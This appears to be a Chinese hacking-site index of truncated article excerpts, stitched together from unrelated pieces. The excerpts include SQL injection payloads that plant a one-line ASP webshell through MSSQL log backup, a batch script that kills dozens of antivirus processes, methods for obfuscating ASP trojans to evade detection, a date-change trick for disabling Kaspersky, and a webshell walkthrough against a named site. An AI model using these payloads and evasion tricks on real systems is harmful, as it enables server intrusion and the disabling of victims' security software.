KAV：Kaspersky Anti-Virus，卡巴斯基反病毒单机版。KIS：kav internet security，卡巴斯基互联网安全套装。

DB_OWNER权限日志备份专用一句话木马 备份专用一句话加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.日志备份WEBSHELL标准的七步:1.InjectionURL';alter database XXX set RECOVERY FULL-- (把SQL设置成日志完全恢复模式)2.InjectionURL';create table cmd (a image)-- (新建立一个cmd表)3.InjectionURL';backup log XXX to disk = 'c:\cmd' with init-- (减少备份数据的大小)4.InjectionURL';insert into cmd (a) values ('')-- (插入一句话木...

@echo offREM 以下批处理内容中止众多安全软件进程tskill Mcshield.exe & tskill VsTskMgr.exe & tskillnaPrdMgr.exe & tskill UpdaterUI.exe & tskill TBMon.exe & tskill scan32.exe & tskill Ravmond.exe & tskill CCenter.exe & tskill RavTask.exe & tskill Rav.exe & tskill Ravmon.exe & tskill RavmonD.exe & tskill RavStub.exe & taskill KVXP.kxp & tskill kvMonXP.kxp & tskill KVCenter.kxp & tskill KRegEx.exe &...

常见的ASP木马免杀方法：信息来源：黑客X档案 作者：黑色记忆1.加密法常用的是用微软的源码加密工具screnc.exe，以此来躲开杀毒软件的追杀。优点是见效明显，一般的有害代码用此法加密后，可以存在于服务器上，发挥原有的功能.缺点是代码经过加密后，是不可识别字符，自己也不认识了。2.大小写转换法把被杀程序里的代码，大小写稍作转换.可以躲过一般的杀毒软件。（WORD可以转换大小写，这招对ASPX木马免杀很管用）。3.混水摸鱼法这种方法也常奏效.fso写成"f"&vbs&"s"&vbs&"o"，运行的结果是...

想必大家都知道MSSQL中SA权限是什么，可以说是至高无上。今天我就它的危害再谈点儿，我所讲的是配合NBSI上传功能得到WebShell。在讲之前先说几个条件，否则得到Shell是有难度的。 1、存在SQL注入，并且数据库类型是MSSQL。 2、连接数据库的权限必须是SA。 3、后台必须有文件上传的程序。 好了，我们找到一个网址hxxp://www.6x36x.com/fangchan/listpro.asp?id=53，用NBSI一会就一目了然了。 很好，数据库类型是MSSQL，权限是SA，再看看第三个条件满足不满足。找到页面中的文章（新闻），看看里面的图片的地址是什...

我们知道命令行下关闭瑞星可以用ntsd命令，那卡巴呢？卡巴的自我保护非常厉害，想用常规的方法关闭它难度不小。其实我们用非常规的思路可以非常简单地关闭它所有的监控与保护，方法是我前些天不知从哪里摘下来的，今天在整理资料的时候突然看到。应该是许多国外杀毒软件所存在的共同问题吧。只需写一个批处理： 程序代码@echo offset date=%date%date 1987-02-06ping -n 45 localhost > nuldate %date%执行之后卡巴斯基的反应如上图所示。 补充（来自网络）：由于卡巴斯基会为了防止盗版，实时检测系统日期，...

传奇事迹： ·侵入美国国防部、中央情报局、五角大楼及北美空中防务体系等防守严密的网络系统。从而对美国一些国家机密了如指掌。　　·闯入美国国家税务总局网络，窃取了许多美国名人纳税的绝密资料。　　·从纽约花旗银行非法转移数字庞大的美元到指定账户。 在所有的黑客中，凯文·米特尼克是最具传奇色彩的人物。好莱坞甚至将他搬上了银幕。在他15岁的时候，仅凭一台电脑和一部调制解调器就闯入了北美空中防务指挥部的计算机系统主机。美国联邦调查局将他列为头号通缉犯，并为他伤透了脑筋。可以说...

                        玩黑的朋友应该很熟悉这个画面吧，呵呵，我也不另外。灰鸽子作为一款国产非常优秀的远程控制软件，深受小黑们的喜爱。然而前些天看到一篇名为"灰鸽子引发互联网全民黑客时代"的文章，说灰鸽子病毒大规模爆发，危害超熊猫烧香：  引用内容         与“熊猫烧香”病毒的“张扬”不同，...